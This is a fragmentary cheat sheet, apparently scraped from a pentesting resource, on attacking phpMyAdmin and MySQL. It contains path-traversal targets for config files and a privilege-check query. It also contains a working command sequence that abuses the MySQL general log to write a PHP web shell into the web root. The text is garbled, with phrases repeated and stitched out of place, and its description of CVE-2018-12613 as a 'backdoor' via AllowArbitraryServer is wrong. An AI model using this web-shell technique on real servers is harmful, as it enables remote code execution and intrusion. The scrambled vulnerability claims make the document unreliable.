../../etc/phpmyadmin/config.inc.php ../../var/lib/phpmyadmin/config.inc.php .../config.inc.php Look for:
SELECT grantee, privilege_type FROM information_schema.user_privileges; If you have SUPER , you can change server variables, kill queries, and potentially compromise the entire DB server. CVE-2018-12613 (Authenticated RCE) In phpMyAdmin 4.8.0–4.8.1, a backdoor allows remote code execution via the $cfg['AllowArbitraryServer'] setting. phpmyadmin hacktricks
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT '<?php system($_GET["cmd"]); ?>'; SET GLOBAL general_log = 'OFF'; For MySQL versions < 5.1 or with plugin directory writable, compile a shared library and create a custom function to run commands. privilege_type FROM information_schema.user_privileges
For pentesters: always check for phpMyAdmin early. For defenders: assume it will be discovered, and harden accordingly. If you have SUPER